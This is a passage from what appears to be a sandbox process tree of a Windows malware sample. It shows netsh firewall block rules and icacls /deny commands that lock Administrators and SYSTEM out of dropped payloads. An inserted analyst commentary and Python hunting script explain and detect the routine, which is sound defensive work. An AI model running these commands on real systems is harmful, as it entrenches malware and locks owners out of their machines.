          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP6" protocol=TCP action=block dir=out remoteip=163.171.140.1-163.171.140.255
          PID:4796
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP6" protocol=TCP action=block dir=out remoteip=163.171.140.1-163.171.140.255
            PID:4184
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP7" protocol=TCP action=block dir=IN remoteip=160.153.246.1-160.153.246.255
          PID:4236
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP7" protocol=TCP action=block dir=IN remoteip=160.153.246.1-160.153.246.255
            PID:3856
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP8" protocol=TCP action=block dir=out remoteip=160.153.246.1-160.153.246.255
          PID:4788
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP8" protocol=TCP action=block dir=out remoteip=160.153.246.1-160.153.246.255
            PID:4848
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP9" protocol=TCP action=block dir=IN remoteip=195.22.26.1-195.22.26.255
          PID:4912
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP9" protocol=TCP action=block dir=IN remoteip=195.22.26.1-195.22.26.255
            PID:4676
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP10" protocol=TCP action=block dir=out remoteip=195.22.26.1-195.22.26.248
          PID:5116
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP10" protocol=TCP action=block dir=out remoteip=195.22.26.1-195.22.26.248
            PID:4808
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP11" protocol=TCP action=block dir=IN remoteip=59.125.179.1-59.125.179.255
          PID:4320
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP11" protocol=TCP action=block dir=IN remoteip=59.125.179.1-59.125.179.255
            PID:2932
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP12" protocol=TCP action=block dir=out remoteip=59.125.179.1-59.125.179.255
          PID:5100
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP12" protocol=TCP action=block dir=out remoteip=59.125.179.1-59.125.179.255
            PID:4272
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP13" protocol=TCP action=block dir=IN remoteip=59.124.90.1-59.124.90.255
          PID:5048
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP13" protocol=TCP action=block dir=IN remoteip=59.124.90.1-59.124.90.255
            PID:1624
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP14" protocol=TCP action=block dir=out remoteip=59.124.90.1-59.124.90.255
          PID:5112
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP14" protocol=TCP action=block dir=out remoteip=59.124.90.1-59.124.90.255
            PID:4084
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP15" protocol=TCP action=block dir=IN remoteip=172.104.56.113
          PID:5092
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP15" protocol=TCP action=block dir=IN remoteip=172.104.56.113
            PID:5052
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP16" protocol=TCP action=block dir=OUT remoteip=172.104.56.113
          PID:4656
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP16" protocol=TCP action=block dir=OUT remoteip=172.104.56.113
            PID:4192
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP17" protocol=TCP action=block dir=IN remoteip=178.128.101.72
          PID:4784
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP17" protocol=TCP action=block dir=IN remoteip=178.128.101.72
            PID:4232
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP18" protocol=TCP action=block dir=out remoteip=178.128.101.72
          PID:4932
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP18" protocol=TCP action=block dir=out remoteip=178.128.101.72
            PID:4760
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP19" protocol=TCP action=block dir=IN remoteip=210.108.146.96
          PID:4708
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP19" protocol=TCP action=block dir=IN remoteip=210.108.146.96
            PID:5232
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP20" protocol=TCP action=block dir=out remoteip=210.108.146.96
          PID:4924
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP20" protocol=TCP action=block dir=out remoteip=210.108.146.96
            PID:5136
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP21" protocol=TCP action=block dir=IN remoteip=176.57.70.81
          PID:5168
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP21" protocol=TCP action=block dir=IN remoteip=176.57.70.81
            PID:5296
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP22" protocol=TCP action=block dir=out remoteip=176.57.70.81
          PID:5180
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP22" protocol=TCP action=block dir=out remoteip=176.57.70.81
            PID:5308
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP23" protocol=TCP action=block dir=IN remoteip=61.130.8.22
          PID:5332
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP23" protocol=TCP action=block dir=IN remoteip=61.130.8.22
            PID:5464
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP24" protocol=TCP action=block dir=out remoteip=61.130.8.22
          PID:5356
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP24" protocol=TCP action=block dir=out remoteip=61.130.8.22
            PID:5456
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP25" protocol=TCP action=block dir=IN remoteip=134.209.181.186
          PID:5496
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP25" protocol=TCP action=block dir=IN remoteip=134.209.181.186
            PID:5624
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP26" protocol=TCP action=block dir=out remoteip=134.209.181.186
          PID:5508
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP26" protocol=TCP action=block dir=out remoteip=134.209.181.186
            PID:5612
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP27" protocol=TCP action=block dir=IN remoteip=134.209.188.169
          PID:5652
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP27" protocol=TCP action=block dir=IN remoteip=134.209.188.169
            PID:5800
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP28" protocol=TCP action=block dir=out remoteip=134.209.188.169
          PID:5676
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP28" protocol=TCP action=block dir=out remoteip=134.209.188.169
            PID:5808
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP29" protocol=TCP action=block dir=IN remoteip=165.22.143.11
          PID:5848
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP29" protocol=TCP action=block dir=IN remoteip=165.22.143.11
            PID:5956
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP30" protocol=TCP action=block dir=out remoteip=165.22.143.11
          PID:5860
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP30" protocol=TCP action=block dir=out remoteip=165.22.143.11
            PID:5964
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=157.230.120.236
          PID:6004
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=157.230.120.236
            PID:6120
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=157.230.120.236
          PID:6016
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=157.230.120.236
            PID:6128
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=156.67.216.61
          PID:4844
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=156.67.216.61
            PID:4868
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=156.67.216.61
          PID:4884
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=156.67.216.61
            PID:4136
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=165.22.23.102
          PID:4984
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=165.22.23.102
            PID:1012
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=165.22.23.102
          PID:4248
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=165.22.23.102
            PID:4124
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=178.128.74.151
          PID:4752
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=178.128.74.151
            PID:5856
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=178.128.74.151
          PID:4496
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=178.128.74.151
            PID:5608
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=104.248.92.26
          PID:5868
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=104.248.92.26
            PID:3872
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=104.248.92.26
          PID:4536
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=104.248.92.26
            PID:4504
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=167.71.52.230
          PID:4456
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=167.71.52.230
            PID:5228
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=167.71.52.230
          PID:5420
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=167.71.52.230
            PID:5340
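The netsh rules above and the icacls commands that follow form one defense-evasion routine: an inbound allow for a dropped binary under C:\ProgramData (the "Small Service" rule), allow rules for TCP 9494/9393 in both directions, block rules against a list of remote ranges (the "HTTP*" names are decoys, and fencing off other addresses is a common way of locking rival operators out of a host), and then icacls /deny for Administrators and SYSTEM (in English and in the Russian localized names Администраторы / система) on the dropped payloads and on anti-malware directories. The script below is an added hunting example, not part of the sandbox report or of the sample; it parses command lines in the shape shown in this tree (as they would appear in Sysmon event 1 or Windows 4688 CommandLine fields) and flags these four patterns. The rule names, the privileged-principal list, the writable-directory prefixes and the expected-port set are assumptions for the example; the sample command lines are constructed from the tree plus two benign administrative lines.

```python
"""Hunting rules for the netsh/icacls defense-evasion pattern seen in the process tree.

Added example, not part of the sandbox report. Input: raw command lines as recorded by
process-creation telemetry (Sysmon EID 1 / Windows 4688 CommandLine).
"""
import re
from typing import Dict, List, Optional, Tuple

# Privileged principals the malware denies; includes the Russian localized names
# observed in the tree (Администраторы = Administrators, система = SYSTEM). Assumption.
PRIVILEGED_PRINCIPALS = {"administrators", "system", "администраторы", "система",
                         "builtin\\administrators", "nt authority\\system"}

# Directories from which a firewall-allowed program is suspicious. Assumption.
WRITABLE_PREFIXES = ("c:\\programdata\\", "c:\\users\\", "c:\\windows\\temp\\")

# Local ports an allow rule may legitimately open; anything else is reported. Assumption.
EXPECTED_LOCAL_PORTS = {"80", "443", "3389"}

_KV = re.compile(r'(\w+)=("([^"]*)"|(\S+))')
_ICACLS = re.compile(r'\bicacls(?:\.exe)?\s+("([^"]+)"|(\S+))\s+(.*)$', re.I)
_DENY = re.compile(r'/deny\s+([^:\s]+):', re.I)


def parse_netsh_rule(cmd: str) -> Dict[str, str]:
    """key=value arguments of a 'netsh advfirewall firewall add rule' line (keys lower-cased)."""
    if "advfirewall firewall add rule" not in cmd.lower():
        return {}
    return {m.group(1).lower(): (m.group(3) if m.group(3) is not None else m.group(4))
            for m in _KV.finditer(cmd)}


def parse_icacls(cmd: str) -> Optional[Tuple[str, List[str]]]:
    """(target path, principals given a /deny ACE) for an icacls line, or None if not icacls."""
    m = _ICACLS.search(cmd)
    if not m:
        return None
    path = m.group(2) if m.group(2) is not None else m.group(3)
    return path, [p.lower() for p in _DENY.findall(m.group(4))]


def analyze_cmdline(cmd: str) -> List[str]:
    """Names of the hunting rules a single command line triggers (empty list if none)."""
    hits: List[str] = []
    args = parse_netsh_rule(cmd)
    if args:
        action = args.get("action", "").lower()
        program = args.get("program", "").lower()
        if action == "allow" and program.startswith(WRITABLE_PREFIXES):
            hits.append("fw_allow_program_in_writable_dir")   # e.g. the "Small Service" rule
        if action == "allow" and args.get("localport") not in (None, *EXPECTED_LOCAL_PORTS):
            hits.append("fw_allow_unexpected_port")           # e.g. AllowPort1..4 on 9494/9393
        if action == "block" and "remoteip" in args:
            hits.append("fw_block_remote_ip")                 # e.g. the HTTP1..32 block rules
    parsed = parse_icacls(cmd)
    if parsed and any(p in PRIVILEGED_PRINCIPALS for p in parsed[1]):
        hits.append("acl_deny_privileged_principal")          # /deny Administrators|SYSTEM
    return hits


def analyze(cmdlines: List[str]) -> Dict[str, List[str]]:
    """Map each triggered rule name to the command lines that triggered it."""
    report: Dict[str, List[str]] = {}
    for cmd in cmdlines:
        for rule in analyze_cmdline(cmd):
            report.setdefault(rule, []).append(cmd)
    return report


# Constructed sample: six lines copied in shape from the tree, two benign admin lines.
SAMPLE_CMDLINES = [
    r'netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes',
    r'netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN',
    r'netsh advfirewall firewall add rule name="HTTP1" protocol=TCP action=block dir=IN remoteip=61.216.5.1-61.216.5.255',
    r'C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\lsmm.exe" /deny Администраторы:(OI)(CI)(F)',
    r'icacls C:\Windows\java.exe /deny System:(F)',
    r'icacls c:\programdata\Malwarebytes /deny Администраторы:(F)',
    r'netsh advfirewall firewall add rule name="Remote Desktop" dir=in action=allow protocol=TCP localport=3389',
    r'icacls C:\Users\Public\share /grant Users:(OI)(CI)(RX)',
]

if __name__ == "__main__":
    for rule, lines in analyze(SAMPLE_CMDLINES).items():
        print(f"{rule}: {len(lines)} hit(s)")
        for line in lines:
            print("   ", line)
```

Run against real telemetry, the two firewall rules worth the most attention are the program allow and the port allows; the remote-IP block rules and the /deny ACEs are unusual enough on a workstation that they can be alerted on directly. A host cleanup has to undo the ACEs before the files can be removed (icacls /remove:d for each denied principal, or takeown followed by a reset), otherwise even SYSTEM-level tooling will fail to delete them.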
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\lsmm.exe" /deny Администраторы:(OI)(CI)(F)
          PID:5336
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\WINDOWS\inf\lsmm.exe" /deny Администраторы:(OI)(CI)(F)
            PID:5512
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\lsmm.exe" /deny system:(OI)(CI)(F)
          PID:5428
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\WINDOWS\inf\lsmm.exe" /deny system:(OI)(CI)(F)
            PID:5664
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\lsmm.exe" /deny Administrators:(OI)(CI)(F)
          PID:4864
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\WINDOWS\inf\lsmm.exe" /deny Administrators:(OI)(CI)(F)
            PID:5840
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\msief.exe" /deny Администраторы:(OI)(CI)(F)
          PID:2844
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\WINDOWS\inf\msief.exe" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:5824
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\msief.exe" /deny system:(OI)(CI)(F)
          PID:5532
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\WINDOWS\inf\msief.exe" /deny system:(OI)(CI)(F)
            PID:5988
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\msief.exe" /deny Administrators:(OI)(CI)(F)
          PID:5704
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\WINDOWS\inf\msief.exe" /deny Administrators:(OI)(CI)(F)
            PID:5916
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Windows\NetworkDistribution" /deny Администраторы:(OI)(CI)(F)
          PID:5288
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Windows\NetworkDistribution" /deny Администраторы:(OI)(CI)(F)
            PID:5864
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Windows\NetworkDistribution" /deny Administrators:(OI)(CI)(F)
          PID:5908
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Windows\NetworkDistribution" /deny Administrators:(OI)(CI)(F)
            PID:6096
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Windows\NetworkDistribution" /deny System:(OI)(CI)(F)
          PID:4256
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Windows\NetworkDistribution" /deny System:(OI)(CI)(F)
            Modifies file permissions
            PID:6136
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny Администраторы:(OI)(CI)(F)
          PID:4252
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\Microsoft JDX" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:4620
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
          PID:4268
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
            PID:5044
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Windows\java.exe /deny Администраторы:(F)
          PID:4904
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Windows\java.exe /deny Администраторы:(F)
            Modifies file permissions
            PID:5500
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Windows\java.exe /deny System:(F)
          PID:3844
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Windows\java.exe /deny System:(F)
            PID:6080
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Windows\java.exe /deny система:(F)
          PID:5172
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Windows\java.exe /deny система:(F)
            PID:3712
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Администраторы:(OI)(CI)(F)
          PID:6112
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:5680
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
          PID:4424
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
            PID:5912
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iexplore.exe" /deny Администраторы:(OI)(CI)(F)
          PID:4484
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\Common Files\System\iexplore.exe" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:5812
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iexplore.exe" /deny System:(OI)(CI)(F)
          PID:4172
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\Common Files\System\iexplore.exe" /deny System:(OI)(CI)(F)
            Modifies file permissions
            PID:5768
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls c:\windows\svchost.exe /deny Администраторы:(F)
          PID:2620
          • C:\Windows\SysWOW64\icacls.exe
            icacls c:\windows\svchost.exe /deny Администраторы:(F)
            PID:5656
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls c:\windows\svchost.exe /deny System:(F)
          PID:4532
          • C:\Windows\SysWOW64\icacls.exe
            icacls c:\windows\svchost.exe /deny System:(F)
            Modifies file permissions
            PID:5996
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls c:\windows\svchost.exe /deny система:(F)
          PID:2732
          • C:\Windows\SysWOW64\icacls.exe
            icacls c:\windows\svchost.exe /deny система:(F)
            Modifies file permissions
            PID:5328
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Администраторы:(OI)(CI)(F)
          PID:5760
          • C:\Windows\SysWOW64\icacls.exe
            icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:5968
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
          PID:5708
          • C:\Windows\SysWOW64\icacls.exe
            icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
            PID:5344
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny Администраторы:(OI)(CI)(F)
          PID:5920
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Windows\Fonts\Mysql" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:6020
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
          PID:4740
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
            Modifies file permissions
            PID:5216
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny Администраторы:(OI)(CI)(F)
          PID:5952
          • C:\Windows\SysWOW64\icacls.exe
            icacls "c:\program files\Internet Explorer\bin" /deny Администраторы:(OI)(CI)(F)
            PID:3924
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
          PID:348
          • C:\Windows\SysWOW64\icacls.exe
            icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
            Modifies file permissions
            PID:4508
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny Администраторы:(OI)(CI)(F)
          PID:6108
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\Zaxar" /deny Администраторы:(OI)(CI)(F)
            PID:5556
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
          PID:5716
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
            Modifies file permissions
            PID:5816
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny Администраторы:(OI)(CI)(F)
          PID:5208
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Windows\speechstracing /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:2132
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
          PID:388
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
            PID:1596
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass.exe /deny Администраторы:(F)
          PID:5176
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\lsass.exe /deny Администраторы:(F)
            PID:5156
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass.exe /deny System:(F)
          PID:4544
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\lsass.exe /deny System:(F)
            Modifies file permissions
            PID:2832
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\kz.exe /deny Администраторы:(F)
          PID:4644
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\kz.exe /deny Администраторы:(F)
            Modifies file permissions
            PID:5904
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\kz.exe /deny System:(F)
          PID:5580
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\kz.exe /deny System:(F)
            Modifies file permissions
            PID:6060
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\script.exe /deny Администраторы:(F)
          PID:5692
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\script.exe /deny Администраторы:(F)
            Modifies file permissions
            PID:5584
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\script.exe /deny System:(F)
          PID:4812
          • C:\Windows\SysWOW64\icacls.exe
